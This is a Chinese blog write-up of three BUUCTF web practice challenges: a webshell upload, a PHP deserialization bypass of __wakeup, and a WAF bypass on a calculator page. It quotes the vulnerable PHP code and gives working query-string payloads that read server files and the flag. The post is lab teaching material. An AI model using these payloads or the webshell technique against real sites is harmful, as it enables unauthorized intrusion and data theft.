BUUCTF web类(3)

最新推荐文章于 2024-07-12 16:55:56 发布
最新推荐文章于 2024-07-12 16:55:56 发布
阅读量70 收藏
点赞数 1
文章标签: 前端 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60399102/article/details/132905210
版权

[ACTF2020 新生赛]Upload

文件上传题,先上传了一张图片,上传成功,并给出了文件位置,文件名被加密了,不过没有关系。

上传上次做好的图片马看看,被限制了,那就抓包发。

几乎没有什么变化,可以看到上传成功,位置也给出来了,访问一下。

看来木马可以使用,连上蚁剑找flag。

根目录下找到flag,简简单单。

[极客大挑战 2019]PHP

进入页面,看到一只喵喵,可以用线球去逗它,但是重点还是出题者的这句话,既然备份了网站,

那我们可以试试扫描下目录。

用御剑啥也没扫出来,没有头绪了看看大佬们的解法找到一个www.zip这个备份网站压缩包,那现在就着重分析代码了。

在index.php中找到这么一串代码,分析下,主要是通过get传输参数‘select’并将其反序列化后给res,所以我们传入的参数得要事先使用serialize()函数序列化一边。

    <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

在class.php中,我们传入的参数要有username与password,且满足以下条件(写注释里了)。

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';//在这定义两个类
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';//对于输入的username都赋予‘guest’
    }

    function __destruct(){
        if ($this->password != 100) {//判断password的长度,等于100为真,其他为假
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {//只有当username等于‘admin’时输出flag
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

这时候要提一点,private 赋值的属性被序列化后属性名会变成\0类名\0字段名,所以序列化后添加即可,且由于_wakeup()会强制改变username的值,只有当对象属性的个数的值大于真实的属性个数的时候会跳过__wakeup的执行,把name后面的数字2改为大于2的数字,接下来用php写一段序列化代码。

<?php  
$strings = array("username", "admin", "password");  
  
// 序列化字符串数组  
$serializedStrings = serialize($strings);  
  
// 输出序列化后的字符串  
echo $serializedStrings;  
?>

修改后如下,赋值给 select得到flag

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

 

 [RoarCTF 2019]Easy Calc

进入页面是一个计算器,测试了一下,只要输入字母与字符都会被栏住,先看下源码。

看来添加了waf,最后看到了一个 calc.php页面,可以去看看。

 

 

看到源码,主要可以通过num传入一个参数,但是过滤了大量符号,想想怎么构造paylaod。

 

后来发现只要num为数字外的其他数,都会直接进不去,看来是waf的过滤原则起作用了。

 

这时候找到一个方法,通过在num前加一个空隔就可绕过waf的检测,同时php在解析语句时会自己删除前面的空格,这时候构造paylaod。

用括号代替空格,chr(47)代替“\”来遍历一下网站文件目录

? num=var_dump(scandir(chr(47)))

 看到一个f1agg,估计就是它了,构造语句去读它。

? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

成功读到flag。

 

 

觉策
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF——Web
2201_75331136的博客
07-11 942
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
BUUCTF部分web题目
05-06
写题记录
Buuctf Web题解
weixin_68029979的博客
04-24 1020
写在前面, 本人小白一枚,记录一下web做题过程,大部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他大佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实大部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
BUUCTF web3
qq_61768489的博客
05-16 972
[WUSTCTF2020]朴实无华 这题主要就是绕过php特性 , 访问假flag页面 ,响应头里有文件提示 访问后得到源码,这里怎么乱码了 逐个击破 if(intval($num)<2020&&intval($num+1)>2021) 这里使用e科学计数法, $num=123e3 intval($num)解析出来是123 满足<2020 intval($num+1) 解析出来是 123e3+1 满足...
buuctf web(3)
qq_63267612的博客
04-24 1738
文章目录[HCTF 2018]WarmUp[ACTF2020 新生赛]Include[强网杯 2019]随便注[ACTF2020 新生赛]Exec[GXYCTF2019]Ping Ping Ping[ACTF2020 新生赛]Upload [HCTF 2018]WarmUp 打开环境,查看源代码,发先一个文件,访问,一堆php代码 又发现一个文件,访问 然后没有思路了,查看大佬的wp,发现php代码最下面有一段if判断,最下面的这段php代码的意思是:这段代码的意思是如果 file 不空、为字符串且经过
【CTF】buuctf web 详解(持续更新)
热门推荐
m0_52923241的博客
08-12 3万+
buuctf web[HCTF 2018]WarmUp[极客大挑战 2019]EasySQL[极客大挑战 2019]Havefun[强网杯 2019]随便注[ACTF2020 新生赛]Include[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File[ACTF2020 新生赛]Exec[极客大挑战 2019]LoveSQL[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Knife[极客大挑战 2019]Http[RoarCTF 2019]Easy
BUUCTF WEB phpweb1
qq_41696858的博客
12-14 291
打开场景,我惊了,我是你哥哥!!!!!! 好吧,直观的感受。这个页面一直在刷新,搞不好是什么js脚本,看看源码,发现了两个hidden参数 而搜索了页面上warning后,很确定前端请求了后端的date函数,所以页面一直在更新,而且格式有错误 既然我们可以在前端调用后端函数,那么为什么不试试其他函数呢 直接尝试eval,发现有过滤 行吧,试试其他的file_get_contents,没被过滤 于是第一payload: func=file_get_contents&p=index.php 得到了ind
BUUCTF web 系列详解 (详细版)持续更新中
llki666的博客
12-27 1820
mb_strpos为查找某值第一次出现的位置,这里表示截取page从0开始到第一个问号之间的字符 串,赋值给_page*/万能密码:1 and 1=1(数字型) 或1' and '1'='1(字符型)或 1 or 1=1(数字型) 或 1 or '1'='1(字符型)/*mb_substr为截断函数,第一个参数为传进来的字符串,第二个为起始位置,第三个参数为长度。mb_substr("abbcv", 0, 2)从第0个位置开始,截取前2个字符串 // 输出:ab。函数截取其中的问号位置之前的子串。
BUUCTFWeb 解析(一)
Flag少侠的博客
05-03 1845
[极客大挑战 2019] EasySQL、[极客大挑战 2019] Havefun、[HCTF 2018] WarmUp、[ACTF2020 新生赛] Include、[ACTF2020 新生赛] Exec、[GXYCTF2019] Ping Ping Ping、[SUCTF 2019] EasySQL、[强网杯 2019] 随便注
BUUCTF web题目之 Havefun
m0_54993799的博客
12-10 531
BUUCTF web题目之 Havefun
buuctf web
个人笔记
02-19 3559
ctf web
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: 在PHP 5.3.0之前,如果`register_globals`配置选项设为`ON`,那么HTTP请求中的变量(如GET、POST、COOKIE等)会被自动转换为全局变量。攻击者可以通过...
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
OpenSNN推文:近期优质博客推荐汇总
最新发布
opensnn的博客
07-12 310
国内个人博客站点众多,涵盖了技术、生活、艺术等多个领域。
更新商品前端接口编写
weixin_55639995的博客
07-12 345
那么在vue运行的时候,会加载所有的ref属性特征的元素还有组件。标签中ref的作用就是将 该组件注册到vue对象的ref属性中。使用插槽,那个scope就是代表着一行的数据。然后里面的选项遍历的是 js定义的数据。如果文字显示过多可以使用 文本隐藏显示。表单绑定还有表单数据的绑定。数据绑定使用的表单绑定状态。写form表单然后封装数据。状态的选择使用的是选择框。副标题使用的是文本域。状态页面使用,下拉框。富文本选择器使用组件。使用后端枚举型去写。
如何搭建互联网医院系统源码?医疗陪诊APP开发实战详解
meihusdk的博客
07-11 287
希望本文能够为正在或即将从事相关开发的技术人员提供一些参考和帮助。通过不断的努力和创新,我们可以为患者提供更优质的医疗服务,推动医疗行业的数字化转型。
Node多版本管理器NVM安装使用
GongWeiBuQi的博客
07-11 202
安装node很方便,只需要一条命令可以轻松切换node版本可以多版本node并存。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值